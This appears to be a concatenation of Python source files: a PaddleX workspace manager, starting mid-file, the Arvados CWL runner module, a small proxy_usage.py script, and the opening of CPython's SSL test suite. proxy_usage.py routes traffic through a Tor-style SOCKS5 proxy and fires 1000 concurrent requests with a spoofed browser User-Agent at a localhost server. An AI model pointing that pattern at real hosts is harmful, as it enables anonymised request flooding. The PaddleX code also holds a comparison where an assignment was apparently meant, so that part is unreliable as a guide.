ds = self.workspace.datasets[key]
try:
info_file = os.path.join(ds.path, 'info.pb')
with open(info_file, 'wb') as f:
f.write(ds.SerializeToString())
except Exception as e:
self.logger.info(traceback.format_exc())
for key in self.workspace.projects:
pj = self.workspace.projects[key]
try:
info_file = os.path.join(pj.path, 'info.pb')
with open(info_file, 'wb') as f:
f.write(pj.SerializeToString())
except Exception as e:
self.logger.info(traceback.format_exc())
for key in self.workspace.tasks:
task = self.workspace.tasks[key]
try:
info_file = os.path.join(task.path, 'info.pb')
with open(info_file, 'wb') as f:
f.write(task.SerializeToString())
except Exception as e:
self.logger.info(traceback.format_exc())
self.workspace.version == '0.2.0'
def recover_workspace(self):
if len(self.workspace.projects) > 0 or len(
self.workspace.datasets) > 0:
return
projects_dir = os.path.join(self.workspace.path, 'projects')
datasets_dir = os.path.join(self.workspace.path, 'datasets')
if not os.path.exists(projects_dir):
os.makedirs(projects_dir)
if not os.path.exists(datasets_dir):
os.makedirs(datasets_dir)
max_project_id = 0
max_dataset_id = 0
max_task_id = 0
for pd in os.listdir(projects_dir):
try:
if pd[0] != 'P':
continue
if int(pd[1:]) > max_project_id:
max_project_id = int(pd[1:])
except:
continue
info_pb_file = os.path.join(projects_dir, pd, 'info.pb')
if not os.path.exists(info_pb_file):
continue
try:
pj = w.Project()
with open(info_pb_file, 'rb') as f:
pj.ParseFromString(f.read())
self.workspace.projects[pd].CopyFrom(pj)
except Exception as e:
self.logger.info(traceback.format_exc())
for td in os.listdir(os.path.join(projects_dir, pd)):
try:
if td[0] != 'T':
continue
if int(td[1:]) > max_task_id:
max_task_id = int(td[1:])
except:
continue
info_pb_file = os.path.join(projects_dir, pd, td, 'info.pb')
if not os.path.exists(info_pb_file):
continue
try:
task = w.Task()
with open(info_pb_file, 'rb') as f:
task.ParseFromString(f.read())
self.workspace.tasks[td].CopyFrom(task)
except Exception as e:
self.logger.info(traceback.format_exc())
for dd in os.listdir(datasets_dir):
try:
if dd[0] != 'D':
continue
if int(dd[1:]) > max_dataset_id:
max_dataset_id = int(dd[1:])
except:
continue
info_pb_file = os.path.join(datasets_dir, dd, 'info.pb')
if not os.path.exists(info_pb_file):
continue
try:
ds = w.Dataset()
with open(info_pb_file, 'rb') as f:
ds.ParseFromString(f.read())
self.workspace.datasets[dd].CopyFrom(ds)
except Exception as e:
self.logger.info(traceback.format_exc())
self.workspace.max_dataset_id = max_dataset_id
self.workspace.max_project_id = max_project_id
self.workspace.max_task_id = max_task_id
# 每间隔interval秒,将workspace同步到本地文件
def sync_with_local(self, interval=2):
def sync_func(s, interval_seconds=2):
newest_file = osp.join(self.workspace.path, 'workspace.newest.pb')
stable_file = osp.join(self.workspace.path, 'workspace.stable.pb')
bak_file = osp.join(self.workspace.path, 'workspace.bak.pb')
flag_file = osp.join(self.workspace.path, '.pb.success')
while True:
current_time = time.time()
time_array = time.localtime(current_time)
current_time = time.strftime("%Y-%m-%d %H:%M:%S", time_array)
self.workspace.current_time = current_time
if osp.exists(flag_file):
os.remove(flag_file)
f = open(newest_file, mode='wb')
f.write(s.workspace.SerializeToString())
f.close()
open(flag_file, 'w').close()
if osp.exists(stable_file):
shutil.copyfile(stable_file, bak_file)
shutil.copyfile(newest_file, stable_file)
if s.stop_running:
break
time.sleep(interval_seconds)
t = Thread(target=sync_func, args=(self, interval))
t.start()
return t
def check_hardware_env(self):
# 判断是否有gpu,cpu值是否已经设置
hasGpu = True
try:
'''data = {'path' : path}
from .system import get_machine_info
info = get_machine_info(data, self.machine_info)['info']
if info is None:
return
if (info['gpu_num'] == 0 and self.sysstr == "Windows"):
data['path'] = os.path.abspath(os.path.dirname(__file__))
info = get_machine_info(data, self.machine_info)['info']'''
from .system import get_system_info
info = get_system_info()['info']
hasGpu = (info['gpu_num'] > 0)
self.machine_info = info
#driver_ver = info['driver_version']
# driver_ver_list = driver_ver.split(".")
# major_ver, minor_ver = driver_ver_list[0:2]
# if sysstr == "Windows":
# if int(major_ver) < 411 or \
# (int(major_ver) == 411 and int(minor_ver) < 31):
# raise Exception("The GPU dirver version should be larger than 411.31")
#
# elif sysstr == "Linux":
# if int(major_ver) < 410 or \
# (int(major_ver) == 410 and int(minor_ver) < 48):
# raise Exception("The GPU dirver version should be larger than 410.48")
except Exception as e:
hasGpu = False
self.m_HasGpu = hasGpu
self.save_app_cfg_file()
def save_app_cfg_file(self):
#更新程序配置信息
app_conf_file_name = 'PaddleX'.lower() + ".cfg"
with open(os.path.join(PADDLEX_HOME, app_conf_file_name),
'w+') as file:
self.m_cfgfile.write(file)
def init_workspace(workspace, dirname, logger):
wp = Workspace(workspace, dirname, logger)
#if not machine_info:
#machine_info.update(wp.machine_info)
return {'status': 1}
def set_attr(data, workspace):
"""对workspace中项目,数据,任务变量进行修改赋值
Args:
data为dict,key包括
'struct'结构类型,可以是'dataset', 'project'或'task';
'id'查询id, 其余的key:value则分别为待修改的变量名和相应的修改值。
"""
struct = data['struct']
id = data['id']
assert struct in ['dataset', 'project', 'task'
], "struct只能为dataset, project或task"
if struct == 'dataset':
assert id in workspace.datasets, "数据集ID'{}'不存在".format(id)
modify_struct = workspace.datasets[id]
elif struct == 'project':
assert id in workspace.projects, "项目ID'{}'不存在".format(id)
modify_struct = workspace.projects[id]
elif struct == 'task':
assert id in workspace.tasks, "任务ID'{}'不存在".format(id)
modify_struct = workspace.tasks[id]
'''for k, v in data.items():
if k in ['id', 'struct']:
continue
assert hasattr(modify_struct,
k), "{}不存在成员变量'{}'".format(type(modify_struct), k)
setattr(modify_struct, k, v)'''
for k, v in data['attr_dict'].items():
assert hasattr(modify_struct,
k), "{}不存在成员变量'{}'".format(type(modify_struct), k)
setattr(modify_struct, k, v)
with open(os.path.join(modify_struct.path, 'info.pb'), 'wb') as f:
f.write(modify_struct.SerializeToString())
return {'status': 1}
def get_attr(data, workspace):
"""取出workspace中项目,数据,任务变量值
Args:
data为dict,key包括
'struct'结构类型,可以是'dataset', 'project'或'task';
'id'查询id, 'attr_list'需要获取的属性值列表
"""
struct = data['struct']
id = data['id']
assert struct in ['dataset', 'project', 'task'
], "struct只能为dataset, project或task"
if struct == 'dataset':
assert id in workspace.datasets, "数据集ID'{}'不存在".format(id)
modify_struct = workspace.datasets[id]
elif struct == 'project':
assert id in workspace.projects, "项目ID'{}'不存在".format(id)
modify_struct = workspace.projects[id]
elif struct == 'task':
assert id in workspace.tasks, "任务ID'{}'不存在".format(id)
modify_struct = workspace.tasks[id]
attr = {}
for k in data['attr_list']:
if k in ['id', 'struct']:
continue
assert hasattr(modify_struct,
k), "{}不存在成员变量'{}'".format(type(modify_struct), k)
v = getattr(modify_struct, k)
attr[k] = v
return {'status': 1, 'attr': attr}
|
__init__.py
|
#!/usr/bin/env python
# Implement cwl-runner interface for submitting and running work on Arvados, using
# either the Crunch jobs API or Crunch containers API.
import argparse
import logging
import os
import sys
import threading
import hashlib
import copy
import json
from functools import partial
import pkg_resources # part of setuptools
from cwltool.errors import WorkflowException
import cwltool.main
import cwltool.workflow
import schema_salad
import arvados
import arvados.config
from .arvcontainer import ArvadosContainer, RunnerContainer
from .arvjob import ArvadosJob, RunnerJob, RunnerTemplate
from. runner import Runner, upload_instance
from .arvtool import ArvadosCommandTool
from .arvworkflow import ArvadosWorkflow, upload_workflow
from .fsaccess import CollectionFsAccess
from .perf import Perf
from .pathmapper import FinalOutputPathMapper
from ._version import __version__
from cwltool.pack import pack
from cwltool.process import shortname, UnsupportedRequirement, getListing
from cwltool.pathmapper import adjustFileObjs, adjustDirObjs
from cwltool.draft2tool import compute_checksums
from arvados.api import OrderedJsonModel
logger = logging.getLogger('arvados.cwl-runner')
metrics = logging.getLogger('arvados.cwl-runner.metrics')
logger.setLevel(logging.INFO)
class ArvCwlRunner(object):
"""Execute a CWL tool or workflow, submit work (using either jobs or
containers API), wait for them to complete, and report output.
"""
def __init__(self, api_client, work_api=None, keep_client=None, output_name=None):
self.api = api_client
self.processes = {}
self.lock = threading.Lock()
self.cond = threading.Condition(self.lock)
self.final_output = None
self.final_status = None
self.uploaded = {}
self.num_retries = 4
self.uuid = None
self.stop_polling = threading.Event()
self.poll_api = None
self.pipeline = None
self.final_output_collection = None
self.output_name = output_name
self.project_uuid = None
if keep_client is not None:
self.keep_client = keep_client
else:
self.keep_client = arvados.keep.KeepClient(api_client=self.api, num_retries=self.num_retries)
for api in ["jobs", "containers"]:
try:
methods = self.api._rootDesc.get('resources')[api]['methods']
if ('httpMethod' in methods['create'] and
(work_api == api or work_api is None)):
self.work_api = api
break
except KeyError:
pass
if not self.work_api:
if work_api is None:
raise Exception("No supported APIs")
else:
raise Exception("Unsupported API '%s'" % work_api)
def arv_make_tool(self, toolpath_object, **kwargs):
kwargs["work_api"] = self.work_api
if "class" in toolpath_object and toolpath_object["class"] == "CommandLineTool":
return ArvadosCommandTool(self, toolpath_object, **kwargs)
elif "class" in toolpath_object and toolpath_object["class"] == "Workflow":
return ArvadosWorkflow(self, toolpath_object, **kwargs)
else:
return cwltool.workflow.defaultMakeTool(toolpath_object, **kwargs)
def output_callback(self, out, processStatus):
if processStatus == "success":
logger.info("Overall process status is %s", processStatus)
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": "Complete"}).execute(num_retries=self.num_retries)
else:
logger.warn("Overall process status is %s", processStatus)
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": "Failed"}).execute(num_retries=self.num_retries)
self.final_status = processStatus
self.final_output = out
def on_message(self, event):
if "object_uuid" in event:
if event["object_uuid"] in self.processes and event["event_type"] == "update":
if event["properties"]["new_attributes"]["state"] == "Running" and self.processes[event["object_uuid"]].running is False:
uuid = event["object_uuid"]
with self.lock:
j = self.processes[uuid]
logger.info("Job %s (%s) is Running", j.name, uuid)
j.running = True
j.update_pipeline_component(event["properties"]["new_attributes"])
elif event["properties"]["new_attributes"]["state"] in ("Complete", "Failed", "Cancelled"):
uuid = event["object_uuid"]
try:
self.cond.acquire()
j = self.processes[uuid]
logger.info("Job %s (%s) is %s", j.name, uuid, event["properties"]["new_attributes"]["state"])
with Perf(metrics, "done %s" % j.name):
j.done(event["properties"]["new_attributes"])
self.cond.notify()
finally:
self.cond.release()
def poll_states(self):
"""Poll status of jobs or containers listed in the processes dict.
Runs in a separate thread.
"""
while True:
self.stop_polling.wait(15)
if self.stop_polling.is_set():
break
with self.lock:
keys = self.processes.keys()
if not keys:
continue
if self.work_api == "containers":
table = self.poll_api.containers()
elif self.work_api == "jobs":
table = self.poll_api.jobs()
try:
proc_states = table.list(filters=[["uuid", "in", keys]]).execute(num_retries=self.num_retries)
except Exception as e:
logger.warn("Error checking states on API server: %s", e)
continue
for p in proc_states["items"]:
self.on_message({
"object_uuid": p["uuid"],
"event_type": "update",
"properties": {
"new_attributes": p
}
})
def get_uploaded(self):
return self.uploaded.copy()
def add_uploaded(self, src, pair):
self.uploaded[src] = pair
def check_writable(self, obj):
if isinstance(obj, dict):
if obj.get("writable"):
raise UnsupportedRequirement("InitialWorkDir feature 'writable: true' not supported")
for v in obj.itervalues():
self.check_writable(v)
if isinstance(obj, list):
for v in obj:
self.check_writable(v)
def make_output_collection(self, name, outputObj):
outputObj = copy.deepcopy(outputObj)
files = []
def capture(fileobj):
files.append(fileobj)
adjustDirObjs(outputObj, capture)
adjustFileObjs(outputObj, capture)
generatemapper = FinalOutputPathMapper(files, "", "", separateDirs=False)
final = arvados.collection.Collection(api_client=self.api,
keep_client=self.keep_client,
num_retries=self.num_retries)
srccollections = {}
for k,v in generatemapper.items():
sp = k.split("/")
srccollection = sp[0][5:]
if srccollection not in srccollections:
srccollections[srccollection] = arvados.collection.CollectionReader(
srccollection,
api_client=self.api,
keep_client=self.keep_client,
num_retries=self.num_retries)
reader = srccollections[srccollection]
try:
srcpath = "/".join(sp[1:]) if len(sp) > 1 else "."
final.copy(srcpath, v.target, source_collection=reader, overwrite=False)
except IOError as e:
logger.warn("While preparing output collection: %s", e)
def rewrite(fileobj):
fileobj["location"] = generatemapper.mapper(fileobj["location"]).target
for k in ("basename", "size", "listing"):
if k in fileobj:
del fileobj[k]
adjustDirObjs(outputObj, rewrite)
adjustFileObjs(outputObj, rewrite)
with final.open("cwl.output.json", "w") as f:
json.dump(outputObj, f, sort_keys=True, indent=4, separators=(',',': '))
final.save_new(name=name, owner_uuid=self.project_uuid, ensure_unique_name=True)
logger.info("Final output collection %s \"%s\" (%s)", final.portable_data_hash(),
final.api_response()["name"],
final.manifest_locator())
self.final_output_collection = final
def arv_executor(self, tool, job_order, **kwargs):
self.debug = kwargs.get("debug")
tool.visit(self.check_writable)
useruuid = self.api.users().current().execute()["uuid"]
self.project_uuid = kwargs.get("project_uuid") if kwargs.get("project_uuid") else useruuid
self.pipeline = None
make_fs_access = kwargs.get("make_fs_access") or partial(CollectionFsAccess,
api_client=self.api,
keep_client=self.keep_client)
self.fs_access = make_fs_access(kwargs["basedir"])
if kwargs.get("create_template"):
tmpl = RunnerTemplate(self, tool, job_order, kwargs.get("enable_reuse"))
tmpl.save()
# cwltool.main will write our return value to stdout.
return tmpl.uuid
if kwargs.get("create_workflow") or kwargs.get("update_workflow"):
return upload_workflow(self, tool, job_order, self.project_uuid, kwargs.get("update_workflow"))
self.ignore_docker_for_reuse = kwargs.get("ignore_docker_for_reuse")
kwargs["make_fs_access"] = make_fs_access
kwargs["enable_reuse"] = kwargs.get("enable_reuse")
kwargs["use_container"] = True
kwargs["tmpdir_prefix"] = "tmp"
kwargs["on_error"] = "continue"
kwargs["compute_checksum"] = kwargs.get("compute_checksum")
if self.work_api == "containers":
kwargs["outdir"] = "/var/spool/cwl"
kwargs["docker_outdir"] = "/var/spool/cwl"
kwargs["tmpdir"] = "/tmp"
kwargs["docker_tmpdir"] = "/tmp"
elif self.work_api == "jobs":
kwargs["outdir"] = "$(task.outdir)"
kwargs["docker_outdir"] = "$(task.outdir)"
kwargs["tmpdir"] = "$(task.tmpdir)"
upload_instance(self, shortname(tool.tool["id"]), tool, job_order)
runnerjob = None
if kwargs.get("submit"):
if self.work_api == "containers":
if tool.tool["class"] == "CommandLineTool":
runnerjob = tool.job(job_order,
self.output_callback,
**kwargs).next()
else:
runnerjob = RunnerContainer(self, tool, job_order, kwargs.get("enable_reuse"), self.output_name)
else:
runnerjob = RunnerJob(self, tool, job_order, kwargs.get("enable_reuse"), self.output_name)
if not kwargs.get("submit") and "cwl_runner_job" not in kwargs and not self.work_api == "containers":
# Create pipeline for local run
self.pipeline = self.api.pipeline_instances().create(
body={
"owner_uuid": self.project_uuid,
"name": shortname(tool.tool["id"]),
"components": {},
"state": "RunningOnClient"}).execute(num_retries=self.num_retries)
logger.info("Pipeline instance %s", self.pipeline["uuid"])
if runnerjob and not kwargs.get("wait"):
runnerjob.run(wait=kwargs.get("wait"))
return runnerjob.uuid
self.poll_api = arvados.api('v1')
self.polling_thread = threading.Thread(target=self.poll_states)
self.polling_thread.start()
if runnerjob:
jobiter = iter((runnerjob,))
else:
if "cwl_runner_job" in kwargs:
self.uuid = kwargs.get("cwl_runner_job").get('uuid')
jobiter = tool.job(job_order,
self.output_callback,
**kwargs)
try:
self.cond.acquire()
# Will continue to hold the lock for the duration of this code
# except when in cond.wait(), at which point on_message can update
# job state and process output callbacks.
loopperf = Perf(metrics, "jobiter")
loopperf.__enter__()
for runnable in jobiter:
loopperf.__exit__()
if runnable:
with Perf(metrics, "run"):
runnable.run(**kwargs)
else:
if self.processes:
self.cond.wait(1)
else:
logger.error("Workflow is deadlocked, no runnable jobs and not waiting on any pending jobs.")
break
loopperf.__enter__()
loopperf.__exit__()
while self.processes:
self.cond.wait(1)
except UnsupportedRequirement:
raise
except:
if sys.exc_info()[0] is KeyboardInterrupt:
logger.error("Interrupted, marking pipeline as failed")
else:
logger.error("Caught unhandled exception, marking pipeline as failed. Error was: %s", sys.exc_info()[1], exc_info=(sys.exc_info()[1] if self.debug else False))
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": "Failed"}).execute(num_retries=self.num_retries)
if runnerjob and runnerjob.uuid and self.work_api == "containers":
self.api.container_requests().update(uuid=runnerjob.uuid,
body={"priority": "0"}).execute(num_retries=self.num_retries)
finally:
self.cond.release()
self.stop_polling.set()
self.polling_thread.join()
if self.final_status == "UnsupportedRequirement":
raise UnsupportedRequirement("Check log for details.")
if self.final_status != "success":
raise WorkflowException("Workflow failed.")
if self.final_output is None:
raise WorkflowException("Workflow did not return a result.")
if kwargs.get("submit") and isinstance(runnerjob, Runner):
logger.info("Final output collection %s", runnerjob.final_output)
else:
if self.output_name is None:
self.output_name = "Output of %s" % (shortname(tool.tool["id"]))
self.make_output_collection(self.output_name, self.final_output)
if kwargs.get("compute_checksum"):
adjustDirObjs(self.final_output, partial(getListing, self.fs_access))
adjustFileObjs(self.final_output, partial(compute_checksums, self.fs_access))
return self.final_output
def versionstring():
"""Print version string of key packages for provenance and debugging."""
arvcwlpkg = pkg_resources.require("arvados-cwl-runner")
arvpkg = pkg_resources.require("arvados-python-client")
cwlpkg = pkg_resources.require("cwltool")
return "%s %s %s, %s %s, %s %s" % (sys.argv[0], __version__, arvcwlpkg[0].version,
"arvados-python-client", arvpkg[0].version,
"cwltool", cwlpkg[0].version)
def arg_parser(): # type: () -> argparse.ArgumentParser
parser = argparse.ArgumentParser(description='Arvados executor for Common Workflow Language')
parser.add_argument("--basedir", type=str,
help="Base directory used to resolve relative references in the input, default to directory of input object file or current directory (if inputs piped/provided on command line).")
parser.add_argument("--outdir", type=str, default=os.path.abspath('.'),
help="Output directory, default current directory")
parser.add_argument("--eval-timeout",
help="Time to wait for a Javascript expression to evaluate before giving an error, default 20s.",
type=float,
default=20)
parser.add_argument("--version", action="store_true", help="Print version and exit")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("--verbose", action="store_true", help="Default logging")
exgroup.add_argument("--quiet", action="store_true", help="Only print warnings and errors.")
exgroup.add_argument("--debug", action="store_true", help="Print even more logging")
parser.add_argument("--metrics", action="store_true", help="Print timing metrics")
parser.add_argument("--tool-help", action="store_true", help="Print command line help for tool")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("--enable-reuse", action="store_true",
default=True, dest="enable_reuse",
help="")
exgroup.add_argument("--disable-reuse", action="store_false",
default=True, dest="enable_reuse",
help="")
parser.add_argument("--project-uuid", type=str, metavar="UUID", help="Project that will own the workflow jobs, if not provided, will go to home project.")
parser.add_argument("--output-name", type=str, help="Name to use for collection that stores the final output.", default=None)
parser.add_argument("--ignore-docker-for-reuse", action="store_true",
help="Ignore Docker image version when deciding whether to reuse past jobs.",
default=False)
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("--submit", action="store_true", help="Submit workflow to run on Arvados.",
default=True, dest="submit")
exgroup.add_argument("--local", action="store_false", help="Run workflow on local host (submits jobs to Arvados).",
default=True, dest="submit")
exgroup.add_argument("--create-template", action="store_true", help="Create an Arvados pipeline template.")
exgroup.add_argument("--create-workflow", action="store_true", help="Create an Arvados workflow.")
exgroup.add_argument("--update-workflow", type=str, metavar="UUID", help="Update existing Arvados workflow with uuid.")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("--wait", action="store_true", help="After submitting workflow runner job, wait for completion.",
default=True, dest="wait")
exgroup.add_argument("--no-wait", action="store_false", help="Submit workflow runner job and exit.",
default=True, dest="wait")
parser.add_argument("--api", type=str,
default=None, dest="work_api",
help="Select work submission API, one of 'jobs' or 'containers'.")
parser.add_argument("--compute-checksum", action="store_true", default=False,
help="Compute checksum of contents while collecting outputs",
dest="compute_checksum")
parser.add_argument("workflow", type=str, nargs="?", default=None, help="The workflow to execute")
parser.add_argument("job_order", nargs=argparse.REMAINDER, help="The input object to the workflow.")
return parser
def add_arv_hints():
cache = {}
res = pkg_resources.resource_stream(__name__, 'arv-cwl-schema.yml')
cache["http://arvados.org/cwl"] = res.read()
res.close()
document_loader, cwlnames, _, _ = cwltool.process.get_schema("v1.0")
_, extnames, _, _ = schema_salad.schema.load_schema("http://arvados.org/cwl", cache=cache)
for n in extnames.names:
if not cwlnames.has_name("http://arvados.org/cwl#"+n, ""):
cwlnames.add_name("http://arvados.org/cwl#"+n, "", extnames.get_name(n, ""))
document_loader.idx["http://arvados.org/cwl#"+n] = {}
def main(args, stdout, stderr, api_client=None, keep_client=None):
parser = arg_parser()
job_order_object = None
arvargs = parser.parse_args(args)
if (arvargs.create_template or arvargs.create_workflow or arvargs.update_workflow) and not arvargs.job_order:
job_order_object = ({}, "")
add_arv_hints()
try:
if api_client is None:
api_client=arvados.api('v1', model=OrderedJsonModel())
runner = ArvCwlRunner(api_client, work_api=arvargs.work_api, keep_client=keep_client, output_name=arvargs.output_name)
except Exception as e:
logger.error(e)
return 1
if arvargs.debug:
logger.setLevel(logging.DEBUG)
if arvargs.quiet:
logger.setLevel(logging.WARN)
logging.getLogger('arvados.arv-run').setLevel(logging.WARN)
if arvargs.metrics:
metrics.setLevel(logging.DEBUG)
logging.getLogger("cwltool.metrics").setLevel(logging.DEBUG)
arvargs.conformance_test = None
arvargs.use_container = True
return cwltool.main.main(args=arvargs,
stdout=stdout,
stderr=stderr,
executor=runner.arv_executor,
makeTool=runner.arv_make_tool,
versionfunc=versionstring,
job_order_object=job_order_object,
make_fs_access=partial(CollectionFsAccess, api_client=api_client))
|
proxy_usage.py
|
import socket
import socks
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
socket.socket = socks.socksocket
# from tornado import ioloop, httpclient
from urllib.request import Request, urlopen
# req = Request('http://127.0.0.1:8000',
# headers={
# 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0'
# })
# print(urlopen(req).read())
from urllib.parse import urlparse
from threading import Thread
import sys
from queue import Queue
import http
concurrent = 1000
i = 0
def doWork():
while True:
url = q.get()
status, url = getStatus(url)
doSomethingWithResult(status, url)
q.task_done()
def getStatus(ourl):
try:
url = urlparse(ourl)
conn = http.client.HTTPConnection(url.netloc)
conn.request("HEAD", url.path)
res = conn.getresponse()
return res.status, ourl
except:
return "error", ourl
def doSomethingWithResult(status, url):
req = Request(url,
headers={
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0'
})
with urlopen(req) as response:
response.read()
print(url.split('?')[-1])
pass
q = Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for i in range(100):
q.put('http://127.0.0.1:8000')
q.join()
except KeyboardInterrupt:
sys.exit(1)
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
